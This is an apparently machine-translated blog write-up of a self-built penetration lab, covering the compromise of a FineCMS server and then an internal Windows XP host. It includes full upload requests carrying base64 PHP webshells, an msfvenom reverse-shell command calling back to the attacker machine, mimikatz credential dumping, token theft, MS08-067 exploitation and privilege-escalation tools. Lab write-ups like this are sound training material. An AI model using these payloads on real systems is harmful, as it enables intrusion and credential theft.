当前位置:网站首页>Self built shooting range 2022
Self built shooting range 2022
2022-07-05 13:42:00 【Syche】
Catalog
One 、 Introduction to shooting range
Two 、 Take down web The server
2.1 Upload and take any file shell
3、 ... and 、 Intranet penetration
One 、 Introduction to shooting range
This shooting range is a simple intranet penetration shooting range . You need to get it first win2008 Server permissions , Then penetrate the intranet and win WinXP,win2008 Not on flag,flag stay WinXP On . A comprehensive test of many knowledge , Protection software is not used yet , It belongs to a relatively basic shooting range .
The main configuration is as follows :
System | ip Address |
kali 2020 | 192.168.1.106 |
win10 ( This machine ) | 192.168.1.104 |
win2008 | 192.168.1.107 |
winxp | 10.101.10.133 |
The range link is as follows :
link :https://pan.baidu.com/s/14WRh6C8Fdpk5hfmZ9ar8Uw
Extraction code :ehs8
ps:win10 and kali Self provided
Sharing too much fear of being blocked , So now it's 10 Quota , There are not many people who should fight in the shooting range .
Two 、 Take down web The server
2.1 Upload and take any file shell
nmap 192.168.1.107 -p 8069 -sV
8069 The port is web port , visit http://192.168.1.107:8069/ Found to be finecms.
Baidu search finecms Loophole
Front desk registration
First upload a normal avatar , Find the way
<?php @eval($_POST['a']); ?> # A Hu Trojan horse base64 encryption
IDw/cGhwIEBldmFsKCRfUE9TVFsnYSddKTsgPz4=
Construct the packet as follows
POST /index.php?s=member&c=account&m=upload&iajax=1 HTTP/1.1
Host: 192.168.1.107:8069
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.107:8069/index.php?s=member&c=account&m=avatar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 9393
Connection: close
Cookie: 24b16fede9a67c9251d3e7c7161c83ac_ci_session=3t2cf0ogg6kuvah0r0mjc4l35a08hv57; member_uid=4; member_cookie=be39236988f55e17096d
tx=data%3Aimage%2Fphp%3Bbase64%2CIDw/cGhwIEBldmFsKCRfUE9TVFsnYSddKTsgPz4=
The above one can be connected with Chinese kitchen knife or Chinese ant sword .
Here I use ice scorpion .base64 Encryption is the horse of ice scorpion .
POST /index.php?s=member&c=account&m=upload&iajax=1 HTTP/1.1
Host: 192.168.1.107:8069
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.107:8069/index.php?s=member&c=account&m=avatar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 9393
Connection: close
Cookie: 24b16fede9a67c9251d3e7c7161c83ac_ci_session=3t2cf0ogg6kuvah0r0mjc4l35a08hv57; member_uid=4; member_cookie=be39236988f55e17096d
tx=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IAoJJF9TRVNTSU9OWydrJ109JGtleTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/Pg==%3D
Here you can upload msf Generated exe.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.106 lport=4444 -f exe -o web.exe
But we all use ice scorpions , Direct rebound shell.
2.2 rebound meterpreter
Use ice scorpion to bounce meterpreter
2.3 Raise the right
migrate pid # Migration process authorization
post/multi/recon/local_exploit_suggester #msf Look for options for raising rights
post/windows/gather/enum_patches
# Find a patch and then use the rights lifting web page
http://bugs.hacking8.com/tiquan/ # Supporting web page for power lifting
Use rotten potatoes with msf Raise the right
execute -HC -f rottenpotato.exe # Silently execute rotten potatoes Generate system Token for permission
use incognito # Use incognito modular
list_tokens -u # List all tokens
impersonate_token "NT AUTHORITY\\SYSTEM" # Stealing tokens
2.4 Grab hash
Use here msf Self contained mimikatz and hashdump have a problem , So I uploaded a github Download the mimikatz
Use the following command to obtain the plaintext password .
cd C:\Users\Administrator\Desktop
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > password.txt
account number | password |
administrator | hacker1961 |
3、 ... and 、 Intranet penetration
3.1 information gathering
adopt ipconfig and arp_scanner Detect the Internet ip
The intranet segment is 10.101.10.0/24
Discover intranet hosts 10.101.10.133
run autoroute -s 10.101.10.0/24 Add route
run autoroute -p Confirm to add route
3.2 Configure agent
use auxiliary/server/socks_proxy
The point to note here is that the version is 4a
set version 4a
run
vim /etc/proxychains.conf edit proxychain Configuration file for
3.3 nmap Scan port
proxychains nmap -Pn -sT 10.101.10.133 -p 80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984 ,6379,7001,7002,9200, 9300 ,11211,27017,27018,50000,50070,50030,21,22,23,2601,3389 --open
3.4 Exploit
80 There's nothing on the port , notice 445 The port can be opened .
use auxiliary/scanner/smb/smb_version # scanning smb edition
search ms08_067 Search for 08067 Loophole , Very classic vulnerability
set rhost 10.101.10.133
run
smb Judgment is winxp sp3 So use ms08_067 Hit it .
There is no need to raise the right here , It's already system jurisdiction .
get flag C:\Documents and Settings\Administrator\Desktop
cd C:\Documents and Settings\Administrator\Desktop
type flag.txt
flag{aGFwcHkgbmV3IHllYXIh}
flag Decryption is
echo "aGFwcHkgbmV3IHllYXIh" | base64 -d
3.5 Remote login
obtain hash
Or use msf Self contained mimikatz
load kiwi load mimikatz
creds_all Grab the password
account number | password |
administrator | 123456 |
then 3389 Sign in
proxychains rdesktop 10.101.10.133
Four 、 Add : Raise the right
Here, the author sorted out some simple knowledge of raising rights while shooting at the shooting range .
4.1 Local rights
NSudoLC Raise the right
# Project description
https://nsudo.m2team.org/zh-hans/
# Project address
https:://github.com/Thdub/NSudo_Installer
Use x64 Of NSudoLC.exe,NSudoLG.exe It is a graphical interface , The latest version of the rights can be raised locally win10.
NSudoLC.exe -U:S -P:E web.exe
You need administrator permission here , Can rise to system jurisdiction
BitsArbitraryFileMoveExploit.exe Raise the right
This is 2020 year 8 One of the moonrises bendi There are loopholes in rights raising , There are many versions affected , Including the latest win10 It is a relatively recent loophole for raising rights . But you can only double-click to execute , One will pop up system Permission window .
4.2 Remote right raising
this paper 2.3 With rotten potatoes in msf Raise the right , Here is another way to raise rights .
Upload cve-2019-1458.exe
And then execute cve-2019-1458.exe web.exe
Bounce back system The powers of the meterpreter
Raising rights can be divided into several categories :
Use system loopholes to claim rights ( It can be divided into local right lifting and remote right lifting )
Migration process authorization (msf Of migrate)
bypassuac Raise the right (msf Integrated modules )
Stealing token rights ( Rotten potatoes )
Use the database to raise rights ( Using the database root jurisdiction , You can get the highest permission )
Links used in this article :
Kernelhub/CVE-2020-0787 at master · iNarcissuss/Kernelhub · GitHub
Kernelhub/cve-2019-1458.exe at master · Ascotbe/Kernelhub · GitHub
The author of this article :
sm
边栏推荐
- Interviewer soul torture: why does the code specification require SQL statements not to have too many joins?
- Kafaka log collection
- The real king of caching, Google guava is just a brother
- Datapipeline was selected into the 2022 digital intelligence atlas and database development report of China Academy of communications and communications
- STM32 reverse entry
- Idea设置方法注释和类注释
- Difference between avc1 and H264
- Summit review | baowanda - an integrated data security protection system driven by compliance and security
- restTemplate详解
- What is a network port
猜你喜欢
今年上半年,通信行业发生了哪些事?
Redis6 master-slave replication and clustering
redis6事务和锁机制
Cloudcompare - point cloud slice
Binder communication process and servicemanager creation process
Catch all asynchronous artifact completable future
【公开课预告】:视频质量评价基础与实践
"Baidu Cup" CTF competition in September, web:upload
Idea remote debugging agent
Usage, installation and use of TortoiseSVN
随机推荐
Catch all asynchronous artifact completable future
【Hot100】33. Search rotation sort array
搭建一个仪式感点满的网站,并内网穿透发布到公网 2/2
先写API文档还是先写代码?
leetcode 10. Regular expression matching regular expression matching (difficult)
Although the volume and price fall, why are the structural deposits of commercial banks favored by listed companies?
百度杯”CTF比赛 2017 二月场,Web:爆破-2
How to choose note taking software? Comparison and evaluation of notion, flowus and WOLAI
go map
SAE international strategic investment geometry partner
【Hot100】34. Find the first and last positions of elements in a sorted array
Flutter 3.0更新后如何应用到小程序开发中
What happened to the communication industry in the first half of this year?
FPGA 学习笔记:Vivado 2019.1 添加 IP MicroBlaze
Clock cycle
Binder communication process and servicemanager creation process
[MySQL usage Script] catch all MySQL time and date types and related operation functions (3)
通讯录(链表实现)
真正的缓存之王,Google Guava 只是弟弟
Redis6 master-slave replication and clustering